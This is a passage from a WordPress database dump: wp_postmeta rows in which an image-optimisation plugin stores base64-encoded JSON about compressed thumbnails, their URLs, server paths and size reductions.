nRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvZWFyMi0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTM1NCwiaWQiOjM4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZWFyMi0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2VhcjItMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9lYXIyLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMzU2LCJpZCI6Mzh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9lYXIyLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZWFyMi0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2VhcjItMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTEzNTgsImlkIjozOH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2VhcjItNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9lYXIyLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvZWFyMi00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTM2MSwiaWQiOjM4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZWFyMi02MDB4NDgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2VhcjItNjAweDQ4MC5qcGciLCJ3aWR0aCI6IjYwMCIsImhlaWdodCI6IjQ4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9lYXIyLTYwMHg0ODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMzYzLCJpZCI6Mzh9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30421, 37, 'wpfc_optimisation_reduction', '1076'); 
INSERT INTO `wp_postmeta` VALUES (30422, 37, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZWFyMS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2VhcjEuanBnIiwid2lkdGgiOjY0MCwiaGVpZ2h0Ijo0ODAsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9lYXIxLmpwZyIsInJlZHVjdGlvbiI6MTA2NSwidGltZSI6MTQ4MzU5MTM3MCwiaWQiOiIzNyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZWFyMS0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2VhcjEtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9lYXIxLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMzcyLCJpZCI6Mzd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZWFyMS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2VhcjEtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9lYXIxLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMzc1LCJpZCI6Mzd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZWFyMS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2VhcjEtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9lYXIxLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMzc3LCJpZCI6Mzd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZWFyMS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2VhcjEtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9lYXIxLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMzc5LCJpZCI6Mzd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZWFyMS01MTB4NDgwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NDgwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2VhcjEtNTEweDQ4MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9lYXIxLTUxMHg0ODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMzgxLCJpZCI6Mzd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9lYXIxLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZWFyMS0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2VhcjEtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTEzODMsImlkIjozN30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2VhcjEtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9lYXIxLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvZWFyMS0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTM4NSwiaWQiOjM3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZWFyMS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2VhcjEtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9lYXIxLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMzg3LCJpZCI6Mzd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9lYXIxLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZWFyMS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2VhcjEtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTEzODksImlkIjozN30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2VhcjEtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9lYXIxLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvZWFyMS00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTM5MiwiaWQiOjM3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZWFyMS02MDB4NDgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2VhcjEtNjAweDQ4MC5qcGciLCJ3aWR0aCI6IjYwMCIsImhlaWdodCI6IjQ4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9lYXIxLTYwMHg0ODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxMzk0LCJpZCI6Mzd9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30423, 36, 'wpfc_optimisation_reduction', '82540'); 
INSERT INTO `wp_postmeta` VALUES (30424, 36, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZGVudGFsbWFjaGluZS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2RlbnRhbG1hY2hpbmUuanBnIiwid2lkdGgiOjU5MCwiaGVpZ2h0IjozOTQsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9kZW50YWxtYWNoaW5lLmpwZyIsInJlZHVjdGlvbiI6ODI1MzAsInRpbWUiOjE0ODM1OTE0MDEsImlkIjoiMzYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2RlbnRhbG1hY2hpbmUtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9kZW50YWxtYWNoaW5lLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvZGVudGFsbWFjaGluZS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTQwNCwiaWQiOjM2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2RlbnRhbG1hY2hpbmUtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9kZW50YWxtYWNoaW5lLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvZGVudGFsbWFjaGluZS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTQwNiwiaWQiOjM2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2RlbnRhbG1hY2hpbmUtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9kZW50YWxtYWNoaW5lLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvZGVudGFsbWFjaGluZS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTQwOCwiaWQiOjM2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2RlbnRhbG1hY2hpbmUtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9kZW50YWxtYWNoaW5lLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvZGVudGFsbWFjaGluZS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTQxMCwiaWQiOjM2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2RlbnRhbG1hY2hpbmUtNTEweDM5NC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjM5NCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9kZW50YWxtYWNoaW5lLTUxMHgzOTQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvZGVudGFsbWFjaGluZS01MTB4Mzk0LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTQxMiwiaWQiOjM2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZGVudGFsbWFjaGluZS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2RlbnRhbG1hY2hpbmUtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9kZW50YWxtYWNoaW5lLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxNDE0LCJpZCI6MzZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9kZW50YWxtYWNoaW5lLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZGVudGFsbWFjaGluZS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2RlbnRhbG1hY2hpbmUtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTE0MTgsImlkIjozNn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2RlbnRhbG1hY2hpbmUtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9kZW50YWxtYWNoaW5lLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvZGVudGFsbWFjaGluZS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MTQyMCwiaWQiOjM2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZGVudGFsbWFjaGluZS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2RlbnRhbG1hY2hpbmUtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9kZW50YWxtYWNoaW5lLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkxNDIyLCJpZCI6MzZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9kZW50YWxtYWNoaW5lLTQwMHgzOTQuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZGVudGFsbWFjaGluZS00MDB4Mzk0LmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiMzk0IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2RlbnRhbG1hY2hpbmUtNDAweDM5NC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTE0MjQsImlkIjozNn1d'); 
INSERT INTO `wp_postmeta` VALUES (30425, 35, 'wpfc_optimisation_reduction', '4253'); 
INSERT INTO `wp_postmeta` VALUES (30426, 35, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY29uZmlkZW50aWFsLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY29uZmlkZW50aWFsLmpwZyIsIndpZHRoIjo2MDAsImhlaWdodCI6OTEsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jb25maWRlbnRpYWwuanBnIiwicmVkdWN0aW9uIjozNzU5LCJ0aW1lIjoxNDgzNTkxNDMxLCJpZCI6IjM1In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jb25maWRlbnRpYWwtMzQweDkxLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6OTEsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2